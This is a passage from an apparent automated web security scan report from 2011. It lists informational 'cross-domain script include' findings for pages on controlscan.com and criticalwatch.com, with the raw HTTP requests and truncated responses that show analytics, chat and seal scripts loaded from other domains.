The response dynamically includes the following scripts from other domains:

https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9
https://s.yimg.com/mi/eu/ywa.js
https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en
https://server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0

Request

GET /pcicompliance.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.1.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:54:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.36. https://www.controlscan.com/shoppingcart.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/shoppingcart.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9
https://s.yimg.com/mi/eu/ywa.js
https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en
https://server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0

Request

GET /shoppingcart.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/pcicompliance.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.2.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&groups=0" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&size=M&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.37. http://www.criticalwatch.com/company/critical-watch-career.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/company/critical-watch-career.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /company/critical-watch-career.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-security.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:32 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.38. http://www.criticalwatch.com/company/critical-watch-contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/company/critical-watch-contact.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6Le5HQcAAAAAALOm71gVj_YwLY75DVJVpFip8USF
http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /company/critical-watch-contact.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-career.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:34 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 14936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.39. http://www.criticalwatch.com/company/critical-watch-security.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/company/critical-watch-security.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /company/critical-watch-security.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:31 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 9062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.40. http://www.criticalwatch.com/company/management.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/company/management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /company/management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-contact.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:08:19 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 15884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.41. http://www.criticalwatch.com/products/mssp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/products/mssp.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /products/mssp.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/vulnerability-management-overview.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:05 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.42. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/products/vulnerability-management-ips.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /products/vulnerability-management-ips.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/mssp.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:06 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 13783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.43. http://www.criticalwatch.com/products/vulnerability-management-overview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/products/vulnerability-management-overview.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /products/vulnerability-management-overview.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-resource-library.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:01 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 18958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.44. http://www.criticalwatch.com/solutions/vulnerability-management.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/solutions/vulnerability-management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /solutions/vulnerability-management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-scan-trial.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:24 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.45. http://www.criticalwatch.com/support/critical-watch-resource-library.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/support/critical-watch-resource-library.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /support/critical-watch-resource-library.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:01:59 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 9219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.46. http://www.criticalwatch.com/support/critical-watch-support.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/support/critical-watch-support.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /support/critical-watch-support.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmb=164981229; __utmc=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:54:43 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.47. http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/support/fusionvm-technical-faq.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /support/fusionvm-technical-faq.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:01:57 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 36003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.48. http://www.criticalwatch.com/vulnerability-management.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/vulnerability-management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /vulnerability-management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=164981229.1572272348.1303732829.1303732829.1303732829.1; __utmc=164981229; __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:52:24 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="descrip
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.49. http://www.criticalwatch.com/vulnerability-scan-trial.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/vulnerability-scan-trial.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6Le5HQcAAAAAALOm71gVj_YwLY75DVJVpFip8USF
http://t2.trackalyzer.com/trackalyze.js
http://www.google-analytics.com/urchin.js

Request

GET /vulnerability-scan-trial.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/vulnerability-management-ips.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:07 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 30086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
